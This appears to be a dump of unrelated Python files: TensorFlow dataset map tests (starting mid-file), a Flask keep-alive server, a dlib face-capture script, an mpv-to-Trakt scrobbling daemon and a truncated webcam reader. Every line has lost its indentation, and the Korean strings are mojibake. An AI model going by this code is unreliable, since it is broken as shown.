results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
for num_threads_val, output_buffer_size_val in [
(1, 1), (1, 2), (2, 2), (2, 4), (8, 8), (8, 16)]:
do_test(num_threads_val, output_buffer_size_val)
def testImplicitDisposeParallelMapDataset(self):
# Tests whether a parallel map dataset will be cleaned up correctly when
# the pipeline does not run it until exhaustion.
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(1000).
components = (np.arange(1000),
np.array([[1, 2, 3]]) * np.arange(1000)[:, np.newaxis],
np.array(37.0) * np.arange(1000))
dataset = self._buildParallelMapDataset(components, 1000, 100, 100)
# NOTE(mrry): Also test that the prefetching thread is cancelled correctly.
dataset = dataset.prefetch(100)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
def testParallelMapUnspecifiedOutputSize(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_threads=2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
def testParallelMapError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_threads=2, output_buffer_size=2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
sess.run(get_next)
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testPrefetchError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"))
.prefetch(2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
sess.run(get_next)
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMapIgnoreError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message")).apply(
error_ops.ignore_errors()))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for x in [1., 2., 3., 5.]:
self.assertEqual(x, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testParallelMapIgnoreError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components).map(
lambda x: array_ops.check_numerics(x, "message"),
num_threads=2,
output_buffer_size=2).apply(error_ops.ignore_errors()))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for x in [1., 2., 3., 5.]:
self.assertEqual(x, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testReadFileIgnoreError(self):
def write_string_to_file(value, filename):
with open(filename, "w") as f:
f.write(value)
filenames = [os.path.join(self.get_temp_dir(), "file_%d.txt" % i)
for i in range(5)]
for filename in filenames:
write_string_to_file(filename, filename)
dataset = (dataset_ops.Dataset.from_tensor_slices(filenames).map(
io_ops.read_file, num_threads=2, output_buffer_size=2).apply(
error_ops.ignore_errors()))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
# All of the files are present.
sess.run(init_op)
for filename in filenames:
self.assertEqual(compat.as_bytes(filename), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Delete one of the files.
os.remove(filenames[0])
# Attempting to read filenames[0] will fail, but ignore_errors()
# will catch the error.
sess.run(init_op)
for filename in filenames[1:]:
self.assertEqual(compat.as_bytes(filename), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureHashTable(self):
# NOTE(mrry): We must use the V2 variants of `HashTable`
# etc. because these produce a `tf.resource`-typed output that is
# compatible with the in-graph function implementation.
default_val = -1
keys = constant_op.constant(["brain", "salad", "surgery"])
values = constant_op.constant([0, 1, 2], dtypes.int64)
table = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
input_sentences = dataset_ops.Dataset.from_tensor_slices(
["brain brain tank salad surgery", "surgery brain"])
iterator = (input_sentences
.map(lambda x: string_ops.string_split([x]).values)
.map(table.lookup)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(table.init)
sess.run(init_op)
print(sess.run(get_next))
print(sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureQueue(self):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(200, dtypes.int64, shapes=[])
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(-1)
.map(lambda _: queue.dequeue()).make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(enqueue_op)
sess.run(close_op)
sess.run(init_op)
for element in elements:
self.assertEqual(element, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureSameResourceMultipleTimes(self):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(
200, dtypes.int64, shapes=[], shared_name="shared_queue")
queue_2 = data_flow_ops.FIFOQueue(
200, dtypes.int64, shapes=[], shared_name="shared_queue")
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(-1)
.map(lambda _: (queue.dequeue(), queue_2.dequeue()))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(enqueue_op)
sess.run(close_op)
sess.run(init_op)
for i in range(100):
self.assertEqual(sorted([elements[i * 2], elements[i * 2 + 1]]),
sorted(sess.run(get_next)))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureVariable(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: counter_var.assign_add(1))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(counter_var.initializer)
sess.run(init_op)
for i in range(10):
self.assertEqual(i, sess.run(counter_var))
self.assertEqual(i + 1, sess.run(get_next))
self.assertEqual(10, sess.run(counter_var))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
self.assertEqual(10, sess.run(counter_var))
def testCaptureUninitializedVariableError(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: counter_var.assign_add(1))
.make_initializable_iterator())
init_op = iterator.initializer
with self.test_session() as sess:
with self.assertRaisesRegexp(errors.FailedPreconditionError,
"Failed to capture resource"):
sess.run(init_op)
def testSeededStatefulOperatorIsProperlyStateful(self):
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: random_ops.random_uniform((), seed=11)).batch(2)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
random_values = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values.extend(sess.run(get_next))
self.assertEqual(10, len(random_values))
self.assertGreater(np.abs(np.diff(random_values)).max(), 1e-6)
sess.run(init_op)
random_values_2 = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values_2.extend(sess.run(get_next))
# Randomness is repeatable given same seed
self.assertAllClose(random_values, random_values_2)
def testMapDict(self):
iterator = (dataset_ops.Dataset.range(10)
.map(lambda x: {"foo": x * 2, "bar": x ** 2})
.map(lambda d: d["foo"] + d["bar"])
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual(i * 2 + i ** 2, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMapNamedtuple(self, count=10):
# construct dataset of tuples
labels = dataset_ops.Dataset.range(count)
images = labels.map(lambda l: -l)
dataset_tuple = dataset_ops.Dataset.zip((labels, images))
# convert dataset of tuples to dataset of namedtuples
example = namedtuple("Example", ["label", "image"])
dataset_namedtuple = dataset_tuple.map(example)
def preprocess_tuple(label, image):
image = 2 * image
return label, image
def preprocess_namedtuple(example):
return example._replace(image=2 * example.image)
# preprocess both datasets
dataset_tuple = dataset_tuple.map(preprocess_tuple)
dataset_namedtuple = dataset_namedtuple.map(preprocess_namedtuple)
next_tuple = dataset_tuple.make_one_shot_iterator().get_next()
next_namedtuple = dataset_namedtuple.make_one_shot_iterator().get_next()
# make sure both datasets contain the same data
with self.test_session() as sess:
for i in range(count):
tuple_, namedtuple_ = sess.run([next_tuple, next_namedtuple])
self.assertEqual(tuple_, namedtuple_)
self.assertEqual(tuple_, (i, -2 * i))
with self.assertRaises(errors.OutOfRangeError):
sess.run(next_namedtuple)
def testUseStepContainerInMap(self):
row = np.arange(6)
iterator = (
dataset_ops.Dataset.from_tensors(row)
.map(lambda elems: functional_ops.map_fn(lambda x: x * x, elems))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
self.assertAllEqual(row ** 2, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testPrefetch(self):
# We will use this event to test that `_map_py_func()` has been
# invoked a certain number of times (6 times, to be exact) after
# consuming fewer elements from the iterator.
ev = threading.Event()
set_event_during_invocation = 5
def _map_py_func(x):
if x == set_event_during_invocation:
ev.set()
return x * x
def _map_fn(x):
return script_ops.py_func(_map_py_func, [x], x.dtype)
buffer_size_placeholder = array_ops.placeholder(dtypes.int64, shape=[])
iterator = (
dataset_ops.Dataset.range(100)
.map(_map_fn)
.prefetch(buffer_size_placeholder)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
# Simple test that prefetch yields the expected values in the
# expected order.
for buffer_size in [1, 10, 100, 1000]:
sess.run(init_op, feed_dict={buffer_size_placeholder: buffer_size})
for i in range(100):
self.assertEqual(i * i, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# We can indirectly observe that varying the buffer size has the
# intended effect by observing when `ev` is set (on the 6th
# invocation of `_map_py_func()`).
# NOTE(mrry): We do not test with `buffer_size ==
# set_event_during_invocation`, because we must consume at least
# one element to start the prefetching.
for buffer_size in range(1, set_event_during_invocation):
event_will_be_set_after_consuming = (
set_event_during_invocation - buffer_size + 1)
ev.clear()
sess.run(init_op, feed_dict={buffer_size_placeholder: buffer_size})
for i in range(event_will_be_set_after_consuming):
self.assertFalse(ev.is_set())
self.assertEqual(i * i, sess.run(get_next))
ev.wait()
for i in range(event_will_be_set_after_consuming, 100):
self.assertEqual(i * i, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testReturnList(self):
iterator = (dataset_ops.Dataset.range(10)
.map(lambda x: [x, constant_op.constant(37.0)])
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual((i, 37.0), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMultiOutputPyFunc(self):
# The `tf.py_func()` op returns a list of tensors for its outputs.
def _map_fn(x_tensor):
def _map_py_func(x):
return x, np.array(37.0, dtype=np.float64)
return script_ops.py_func(
_map_py_func, [x_tensor], [dtypes.int64, dtypes.float64])
iterator = (dataset_ops.Dataset.range(10)
.map(_map_fn)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual((i, 37.0), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def assertSparseValuesEqual(self, a, b):
self.assertAllEqual(a.indices, b.indices)
self.assertAllEqual(a.values, b.values)
self.assertAllEqual(a.dense_shape, b.dense_shape)
def testSparse(self):
def _sparse(i):
return sparse_tensor.SparseTensorValue(
indices=np.array([[0, 0]]),
values=(i * np.array([1])),
dense_shape=np.array([1, 1]))
iterator = (dataset_ops.Dataset.range(10)
.map(_sparse)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
actual = sess.run(get_next)
self.assertTrue(isinstance(actual, sparse_tensor.SparseTensorValue))
self.assertSparseValuesEqual(actual, _sparse(i))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testSparseChain(self):
def _sparse(i):
return sparse_tensor.SparseTensorValue(
indices=np.array([[0, 0]]),
values=(i * np.array([1])),
dense_shape=np.array([1, 1]))
def _check(i):
self.assertTrue(sparse_tensor.is_sparse(i))
return sparse_ops.sparse_concat(0, [i, i])
iterator = (
dataset_ops.Dataset.range(10).map(_sparse).map(_check)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
actual = sess.run(get_next)
self.assertTrue(isinstance(actual, sparse_tensor.SparseTensorValue))
self.assertSparseValuesEqual(actual, _check(_sparse(i)).eval())
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureResourceInMapFn(self):
def _build_ds(iterator):
def _map_fn(x):
get_next = iterator.get_next()
return x * get_next
return dataset_ops.Dataset.range(10).map(_map_fn)
def _build_graph():
captured_iterator = dataset_ops.Dataset.range(
10).make_initializable_iterator()
ds = _build_ds(captured_iterator)
iterator = ds.make_initializable_iterator()
init_op = iterator.initializer
return captured_iterator.initializer, init_op
with ops.Graph().as_default() as g:
captured_init_op, init_op = _build_graph()
with self.test_session(graph=g) as sess:
sess.run(captured_init_op)
with self.assertRaises(errors.UnimplementedError):
# CapturedFunction does not support capturing IteratorResource.
sess.run(init_op)
class MapDatasetSerializationTest(
dataset_serialization_test_base.DatasetSerializationTestBase):
def setUp(self):
self._tensor_slice_len = 7
self._num_epochs = 14
self._num_outputs = self._tensor_slice_len * self._num_epochs
def _build_ds(self, multiplier=37.0):
components = (np.arange(self._tensor_slice_len), np.array([[1, 2, 3]]) *
np.arange(self._tensor_slice_len)[:, np.newaxis],
np.array(multiplier) * np.arange(self._tensor_slice_len))
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components).map(_map_fn)
.repeat(self._num_epochs))
def testSaveRestoreCore(self):
self.run_core_tests(
self._build_ds,
lambda: self._build_ds(multiplier=15.0),
self._num_outputs)
def testSaveStatefulFunction(self):
def _build_ds():
def _map_fn(x):
return random_ops.random_uniform(
(), 0, 10, dtype=dtypes.int32) * math_ops.to_int32(x)
return dataset_ops.Dataset.range(100).map(_map_fn)
self.verify_error_on_save(_build_ds, 15, errors.InvalidArgumentError)
def testCaptureVariableInMapFn(self):
def _build_ds():
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
return (dataset_ops.Dataset.from_tensors(0).repeat(10).map(
lambda _: counter_var.assign_add(1)))
self.verify_error_on_save(_build_ds, 15, errors.InvalidArgumentError)
def testCaptureDefunInMapFn(self):
num_outputs = 100
def _build_ds():
@function.Defun(dtypes.int64)
def defun_fn(x):
return constant_op.constant(1000) + math_ops.to_int32(x)
return dataset_ops.Dataset.range(num_outputs).map(defun_fn)
self.run_core_tests(_build_ds, None, num_outputs)
def testBuildDefunInMapFn(self):
num_outputs = 100
def _build_ds():
@function.Defun(dtypes.int64)
def defun_fn(x):
@function.Defun(dtypes.int32)
def defun_fn_deep(x):
return constant_op.constant(1000) + math_ops.to_int32(x)
return constant_op.constant(11000) + defun_fn_deep(math_ops.to_int32(x))
return dataset_ops.Dataset.range(num_outputs).map(defun_fn)
self.run_core_tests(_build_ds, None, num_outputs)
class IgnoreErrorsSerializationTest(
dataset_serialization_test_base.DatasetSerializationTestBase):
def _build_ds(self, components):
return dataset_ops.Dataset.from_tensor_slices(components).map(
lambda x: array_ops.check_numerics(x, "message")).apply(
error_ops.ignore_errors())
def testIgnoreErrorsCore(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
diff_components = np.array([1., 2., 3., np.nan]).astype(np.float32)
num_outputs = 4
self.run_core_tests(lambda: self._build_ds(components),
lambda: self._build_ds(diff_components), num_outputs)
if __name__ == "__main__":
test.main()
|
webserver.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Webserver OK, Discord Bot OK"
def run():
app.run(host = "0.0.0.0", port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
detectnsaveimg.py
|
import numpy as np
import cv2
import os,shutil
import dlib
face_cascade = cv2.CascadeClassifier('./haarcascade_frontalface_default.xml')
cam = cv2.VideoCapture(0) # Create Camera Object(cam)
datacount=0
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor("shape_predictor_68_face_landmarks.dat")
def facedetection():
global datacount
print("์ผ๊ตด ์ธ์์ ์ํ ์ผ๊ตด ๋ฐ์ดํฐ๋ฅผ ๊ตฌ์ฑํฉ๋๋ค. . ")
train_name=input("์ด๋ฆ์ ์
๋ ฅํ์ธ์:")
print("%s์ ์ผ๊ตด ์ธ์ ๋ฐ์ดํฐ์์ฑ์ ์์ํฉ๋๋ค"%train_name)
if os.path.exists("train-images/%s/"%train_name):
shutil.rmtree("train-images/%s/"%train_name)
os.makedirs("train-images/%s/"%train_name)
while True:
_,frame = cam.read()
#getfaceThread = threading.Thread(target=getface, args=(frame,))
#getfaceThread.start()
#getfaceThread.join() #wait ROI frame data for getface()
flag,ret=getface(frame)
if flag == 1:
cv2.imwrite( "train-images/%s/frontface%d.jpg"%(train_name,datacount) ,ret)
datacount +=1
elif datacount>50 :
print("๋ฐ์ดํฐ ์์ง์ด ์ข
๋ฃ๋์์ต๋๋ค.")
datacount=0
return
else: #face detect failed.
print("์ผ๊ตด์ด ์ธ์๋์ง ์์ต๋๋ค!",end='\r',flush=True)
cv2.imshow("cam",ret)
cv2.waitKey(10)
def getface(frame):
# camera type is VideoCapture
# just show cam image and return current 1 frame
grayframe = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) # image binary
faces = face_cascade.detectMultiScale(grayframe, 1.3, 5)
detected_faces = detector(grayframe, 1) # dlib ๊ธฐ๋ฐ detector
for rect in detected_faces: # i =person ,rect=which
x = rect.left()
y = rect.top()
w = rect.right() - rect.left()
h = rect.bottom() - rect.top()
cropframe = frame[y:y+h,x:x+w]
cropframe= cv2.resize(cropframe,(96,96), interpolation=cv2.INTER_AREA)
print("์ผ๊ตด ์ธ์ ์ค. .[%d%%]"% ((datacount/50)*100) ,end="\r",flush=True)
return (1,cropframe)
return (0,frame)
def caminit():
if cam.isOpened()==False: # cam check
print("์นด๋ฉ๋ผ๊ฐ ์ธ์๋์ง ์์ต๋๋ค.")
def main():
facedetection()
if __name__=='__main__':
caminit()
main()
|
sync_daemon.py
|
#!/usr/bin/env python3
import json
import logging
import sys
import threading
import time
import urllib.parse
import guessit
import os
import requests
import mpv
import trakt_key_holder
import trakt_v2_oauth
log = logging.getLogger('mpvTraktSync')
TRAKT_ID_CACHE_JSON = 'trakt_ids.json'
config = None
last_is_paused = None
last_playback_position = None
last_working_dir = None
last_path = None
last_duration = None
last_file_start_timestamp = None
is_local_state_dirty = True
next_sync_timer = None
next_regular_timer = None
def on_command_response(monitor, command, response):
log.debug('on_command_response(%s, %s)' % (command, response))
global last_is_paused, last_playback_position, last_working_dir, last_path, last_duration, last_file_start_timestamp
global next_sync_timer
last_command_elements = command['command']
if last_command_elements[0] == 'get_property':
if response['error'] != 'success':
log.warning('Command %s failed: %s', command, response)
else:
if last_command_elements[1] == 'pause':
last_is_paused = response['data']
if not last_is_paused and last_file_start_timestamp is None:
last_file_start_timestamp = time.time()
elif last_command_elements[1] == 'percent-pos':
last_playback_position = response['data']
elif last_command_elements[1] == 'working-directory':
last_working_dir = response['data']
elif last_command_elements[1] == 'path':
last_path = response['data']
elif last_command_elements[1] == 'duration':
last_duration = response['data']
log.debug('is_local_state_dirty: %s\nlast_is_paused: %s\nlast_playback_position: %s\nlast_working_dir: %s\nlast_path: %s\nlast_duration: %s',
is_local_state_dirty, last_is_paused, last_playback_position, last_working_dir, last_path, last_duration)
if is_local_state_dirty \
and last_is_paused is not None \
and last_playback_position is not None \
and last_working_dir is not None \
and last_path is not None \
and last_duration is not None:
if next_sync_timer is not None:
next_sync_timer.cancel()
next_sync_timer = threading.Timer(config['seconds_between_mpv_event_and_trakt_sync'], sync_to_trakt,
(last_is_paused, last_playback_position, last_working_dir, last_path,
last_duration, last_file_start_timestamp, False))
next_sync_timer.start()
def on_event(monitor, event):
log.debug('on_event(%s)' % (event))
event_name = event['event']
# when a new file starts, act as if a new mpv instance got connected
if event_name == 'start-file':
on_disconnected()
on_connected(monitor)
elif event_name == 'pause' or event_name == 'unpause' or event_name == 'seek':
global is_local_state_dirty
is_local_state_dirty = True
issue_scrobble_commands(monitor)
def on_connected(monitor):
log.debug('on_connected()')
global is_local_state_dirty
is_local_state_dirty = True
issue_scrobble_commands(monitor)
def on_disconnected():
log.debug('on_disconnected()')
global last_is_paused, last_playback_position, last_working_dir, last_path, last_duration, last_file_start_timestamp
global next_sync_timer, next_regular_timer
global is_local_state_dirty
if next_sync_timer is not None:
next_sync_timer.cancel()
if next_regular_timer is not None:
next_regular_timer.cancel()
if last_is_paused is not None \
and last_playback_position is not None \
and last_working_dir is not None \
and last_path is not None \
and last_duration is not None:
threading.Thread(target=sync_to_trakt, args=(
last_is_paused, last_playback_position, last_working_dir, last_path, last_duration,
last_file_start_timestamp, True)).start()
last_is_paused = None
last_playback_position = None
last_working_dir = None
last_path = None
last_duration = None
last_file_start_timestamp = None
is_local_state_dirty = True
def issue_scrobble_commands(monitor):
monitor.send_get_property_command('working-directory')
monitor.send_get_property_command('path')
monitor.send_get_property_command('percent-pos')
monitor.send_get_property_command('pause')
monitor.send_get_property_command('duration')
schedule_regular_timer(monitor)
def schedule_regular_timer(monitor):
global next_regular_timer
if next_regular_timer is not None:
next_regular_timer.cancel()
next_regular_timer = threading.Timer(config['seconds_between_regular_get_property_commands'],
issue_scrobble_commands, [monitor])
next_regular_timer.start()
def is_finished(playback_position, duration, start_time):
if start_time is not None:
watch_time = time.time() - start_time
# only consider a session finished if
# at least a minimal playback position is reached
# and
# the session is running long enough
if playback_position >= config['percent_minimal_playback_position_before_scrobble'] \
and watch_time >= duration * config['factor_must_watch_before_scrobble']:
return True
return False
def is_url(url):
try:
return urllib.parse.urlparse(url).scheme != ''
except SyntaxError:
return False
def sync_to_trakt(is_paused, playback_position, working_dir, path, duration, start_time, mpv_closed):
log.debug('sync_to_trakt(%s, %d, %s, %s, %d, %d, %s)' % (is_paused, playback_position, working_dir, path, duration, start_time, mpv_closed))
do_sync = False
if not is_url(path) and not os.path.isabs(path):
# If mpv is not started via double click from a file manager, but rather from a terminal,
# the path to the video file is relative and not absolute. For the monitored_directories thing
# to work, we need an absolute path. that's why we need the working dir
path = os.path.join(working_dir, path)
for monitored_directory in config['monitored_directories']:
if path.startswith(monitored_directory):
do_sync = True
break
# empty monitored_directories means: always sync
if len(config['monitored_directories']) == 0:
do_sync = True
for excluded_directory in config['excluded_directories']:
if path.startswith(excluded_directory):
do_sync = False
break
log.debug('do_sync = %s' % (do_sync))
if do_sync:
guess = guessit.guessit(path)
log.debug(guess)
data = get_cached_trakt_data(guess)
if data is not None:
data['progress'] = playback_position
data['app_version'] = '1.0.3'
finished = is_finished(playback_position, duration, start_time)
# closed finished paused trakt action
# False False False start
# False False True pause
# False True False start
# False True True pause
# True False False pause
# True False True pause
# True True False stop
# True True True stop
# is equal to:
if mpv_closed:
if finished:
# trakt is closing and finished watching
# trakt action: stop
url = 'https://api.trakt.tv/scrobble/stop'
else:
# closed before finished watching
# trakt action: pause
url = 'https://api.trakt.tv/scrobble/pause'
elif is_paused:
# paused, while still open
# trakt action: pause
url = 'https://api.trakt.tv/scrobble/pause'
else:
# watching right now
# trakt action: start
url = 'https://api.trakt.tv/scrobble/start'
req = requests.post(url,
json=data,
headers={'trakt-api-version': '2', 'trakt-api-key': trakt_key_holder.get_id(),
'Authorization': 'Bearer ' + trakt_v2_oauth.get_access_token()})
log.info('%s %s %s', url, req.status_code, req.text)
if 200 <= req.status_code < 300:
global is_local_state_dirty
is_local_state_dirty = False
def get_cached_trakt_data(guess):
# load cached ids
if os.path.isfile(TRAKT_ID_CACHE_JSON):
with open(TRAKT_ID_CACHE_JSON) as file:
id_cache = json.load(file)
else:
id_cache = {
'movies': {},
'shows': {}
}
# constructing data to be sent to trakt
# if show or movie name is not found in id_cache, request trakt id from trakt API and cache it.
# then assign dict to data, which has the structure of the json trakt expects for a scrobble call
data = None
if guess['type'] == 'episode':
if guess['title'].lower() not in id_cache['shows']:
log.info('requesting trakt id for show ' + guess['title'])
req = requests.get('https://api.trakt.tv/search/show?field=title&query=' + guess['title'],
headers={'trakt-api-version': '2', 'trakt-api-key': trakt_key_holder.get_id()})
if 200 <= req.status_code < 300 and len(req.json()) > 0:
trakt_id = req.json()[0]['show']['ids']['trakt']
else:
# write n/a into cache, so that unknown shows are only requested once.
# without n/a unknown shows would be requested each time get_cached_trakt_data_from_guess() is called
trakt_id = 'n/a'
log.warning('trakt request failed or unknown show ' + str(guess))
id_cache['shows'][guess['title'].lower()] = trakt_id
trakt_id = id_cache['shows'][guess['title'].lower()]
if trakt_id != 'n/a':
data = {'show': {'ids': {'trakt': id_cache['shows'][guess['title'].lower()]}},
'episode': {'season': guess['season'], 'number': guess['episode']}}
elif guess['type'] == 'movie':
if guess['title'].lower() not in id_cache['movies']:
log.info('requesting trakt id for movie ' + guess['title'])
req = requests.get('https://api.trakt.tv/search/movie?field=title&query=' + guess['title'],
headers={'trakt-api-version': '2', 'trakt-api-key': trakt_key_holder.get_id()})
if 200 <= req.status_code < 300 and len(req.json()) > 0:
trakt_id = req.json()[0]['movie']['ids']['trakt']
else:
# write n/a into cache, so that unknown movies are only requested once.
# without n/a unknown movies would be requested each time get_cached_trakt_data_from_guess() is called
trakt_id = 'n/a'
log.warning('trakt request failed or unknown movie ' + str(guess))
id_cache['movies'][guess['title'].lower()] = trakt_id
trakt_id = id_cache['movies'][guess['title'].lower()]
if trakt_id != 'n/a':
data = {'movie': {'ids': {'trakt': id_cache['movies'][guess['title'].lower()]}}}
else:
log.warning('Unknown guessit type ' + str(guess))
# update cached ids file
with open(TRAKT_ID_CACHE_JSON, mode='w') as file:
json.dump(id_cache, file)
return data
def main():
log.info('launched')
with open('config.json') as file:
global config
config = json.load(file)
monitor = mpv.MpvMonitor.create(on_connected, on_event, on_command_response, on_disconnected)
try:
trakt_v2_oauth.get_access_token() # prompts authentication, if necessary
while True:
if monitor.can_open():
# call monitor.run() as a daemon thread, so that all SIGTERMs are handled here
# Daemon threads die automatically, when the main process ends
thread = threading.Thread(target=monitor.run, daemon=True)
thread.start()
thread.join()
# If thread joins, mpv was closed.
log.info('mpv closed')
else:
# mpv not open
# sleep before next attempt
time.sleep(config['seconds_between_mpv_running_checks'])
except KeyboardInterrupt:
log.info('terminating')
logging.shutdown()
def register_exception_handler():
def error_catcher(*exc_info):
log.critical("Unhandled exception", exc_info=exc_info)
sys.excepthook = error_catcher
# from http://stackoverflow.com/a/31622038
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
init_original = threading.Thread.__init__
def init(self, *args, **kwargs):
init_original(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
if __name__ == '__main__':
import logging.config
logging.config.fileConfig('log.conf')
register_exception_handler()
main()
|
test.py
|
import cv2
import numpy as np
import time
import os
import numpy as np
import time
import threading
import queue
import multiprocessing
os.environ["OPENCV_FFMPEG_CAPTURE_OPTIONS"] = "rtsp_transport;udp"
class ReadFromWebcam(object):
def __init__(self, max_framerate=30.0, webcam_idx=0):
''' Read images from web camera.
Argument:
max_framerate {float}: the real framerate will be reduced below this value.
webcam_idx {int}: index of the web camera on your laptop. It should be 0 by default.
'''
# Settings
self._max_framerate = max_framerate
queue_size = 3
# Initialize video reader
self._video = cv2.VideoCapture(webcam_idx)
self._is_stoped = False
# Use a thread to keep on reading images from web camera
self._imgs_queue = queue.Queue(maxsize=queue_size)
self._is_thread_alive = multiprocessing.Value('i', 1)
self._thread = threading.Thread(
target=self._thread_reading_webcam_images)
self._thread.start()
# Manually control the framerate of the webcam by sleeping
self._min_dt = 1.0 / self._max_framerate
